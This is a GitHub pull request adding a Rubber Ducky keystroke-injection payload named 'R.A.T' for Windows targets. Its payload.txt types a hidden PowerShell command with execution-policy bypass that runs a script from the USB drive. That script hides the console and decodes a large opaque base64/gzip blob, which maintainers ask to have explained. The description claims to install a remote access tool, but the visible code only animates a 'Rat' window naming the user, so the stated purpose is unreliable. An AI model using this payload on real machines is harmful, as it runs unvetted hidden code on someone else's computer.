Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

New Payload - R.A.T #429

Open
wants to merge 2 commits into
base: master
Choose a base branch
from
Open

New Payload - R.A.T #429

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
61b9a82
New Payload
cribb-it Jan 8, 2024
59c5175
Fix for Peaks
cribb-it May 22, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
59 changes: 59 additions & 0 deletions payloads/library/execution/Win_PoSH_RAT/R.ps1
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
function Hide-ConsoleWindow() {
$ShowWindowAsyncCode = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
$ShowWindowAsync = Add-Type -MemberDefinition $ShowWindowAsyncCode -name Win32ShowWindowAsync -namespace Win32Functions -PassThru

$hwnd = (Get-Process -PID $pid).MainWindowHandle
if ($hwnd -ne [System.IntPtr]::Zero) {
# When you got HWND of the console window:
# (It would appear that Windows Console Host is the default terminal application)
$ShowWindowAsync::ShowWindowAsync($hwnd, 0)
} else {
# When you failed to get HWND of the console window:
# (It would appear that Windows Terminal is the default terminal application)

# Mark the current console window with a unique string.
$UniqueWindowTitle = New-Guid
$Host.UI.RawUI.WindowTitle = $UniqueWindowTitle
$StringBuilder = New-Object System.Text.StringBuilder 1024

# Search the process that has the window title generated above.
$TerminalProcess = (Get-Process | Where-Object { $_.MainWindowTitle -eq $UniqueWindowTitle })
# Get the window handle of the terminal process.
# Note that GetConsoleWindow() in Win32 API returns the HWND of
# powershell.exe itself rather than the terminal process.
# When you call ShowWindowAsync(HWND, 0) with the HWND from GetConsoleWindow(),
# the Windows Terminal window will be just minimized rather than hidden.
$hwnd = $TerminalProcess.MainWindowHandle
if ($hwnd -ne [System.IntPtr]::Zero) {
$ShowWindowAsync::ShowWindowAsync($hwnd, 0)
} else {
Write-Host "Failed to hide the console window."
}
}
}
Hide-ConsoleWindow;
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms");
Add-Type -Assembly PresentationFramework
$I = New-Object System.IO.MemoryStream(,[Convert]::FromBase64String('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'))
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please either provide the source or explain how this base64 is derived.

$O = New-Object System.IO.MemoryStream;
$Z = New-Object System.IO.Compression.GzipStream $I, ([IO.Compression.CompressionMode]::Decompress);
$Z.CopyTo($O);
$Z.Close();
$I.Close();
$GR = $true;
$S = [System.Windows.Forms.Screen]::PrimaryScreen;
$W = [Windows.Markup.XamlReader]::Load((New-Object System.Xml.XmlNodeReader([xml][System.Text.Encoding]::UTF8.GetString($O.ToArray()))));
$O.Close();
$R = $W.FindName("R");
$X = $W.FindName("U");
$X.Text = "$U`n$([char]64)$IP`n$([char]105+[char]115+[char]32+[char]97+[char]32+[char]82+[char]97+[char]116)";
$H = [Windows.Input.MouseButtonEventHandler]{$W.Close();$_.Handled=$true;}
$W.Add_MouseRightButtonDown($H);
$W.Left = $S.WorkingArea.Left;
$W.Top = $S.Bounds.Height - $W.Height;
$T = New-Object System.Windows.Forms.Timer;
$T.Interval = 100;
$T.add_Tick({if($GR){if(($W.Left+5)-lt($S.WorkingArea.Width-$W.Width)){$W.Left=($W.Left+5)}else{$R.ScaleX=-1;$script:GR=!$GR;$X.Margin = [System.Windows.Thickness]"100,0,0,0" }}else{if(($W.Left-5)-gt0){$W.Left=($W.Left-5)}else{$R.ScaleX=1;$script:GR=!$GR;$X.Margin = [System.Windows.Thickness]"0"}}});
$W.Add_Closing({$T.Stop();$T.Dispose();})
$T.Start();
$W.ShowDialog();
41 changes: 41 additions & 0 deletions payloads/library/execution/Win_PoSH_RAT/payload.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,41 @@
REM TITLE R.A.T
REM AUTHOR TRIBBIC
REM DESCRIPTION Set up a R.A.T on the target windows machine
REM DUCKY SCRIPT 3

REM USERNAME to login to the R.A.T
DEFINE #USERNAME name
REM Your IP Address use https://www.ipchicken.com/ to get your IP
DEFINE #IPADDRESS 192.168.1.1
ATTACKMODE HID STORAGE
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben

REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay

TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM

REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120

VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION

GUI r
DELAY 200
STRINGLN powershell -Noni -NoP -W h -EP Bypass $U='#USERNAME';$IP='#IPADDRESS'; iex((Get-Volume -FileSystemLabel 'DUCKY').DriveLetter+':\R.ps1')
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I would suggest using a DEFINE for those who may not be using the default drive label of "DUCKY"

you would do this by adding to the top of the payload:
DEFINE #DUCKY_DRIVE_LABEL DUCKY
and then update references to the drive label to be something like (in the case of this line):
STRINGLN powershell -Noni -NoP -W h -EP Bypass $U='#USERNAME';$IP='#IPADDRESS'; iex((Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter+':\R.ps1')

22 changes: 22 additions & 0 deletions payloads/library/execution/Win_PoSH_RAT/readme.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
# RAT
- Author: TRIBBIC
- Version: 1.0
- Target: Windows 10 (Powershell 5.1+)
- Category: Execution
- Attackmode: HID & Storage
- Ducky Script Version: 3

## Setup
In the payload.txt change the two DEFINE's

\#USERNAME Should be your login name

\#IPADDRESS Should be your IP Address

## Description
Create a R.A.T using Windows Powershell on Targets PC

## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |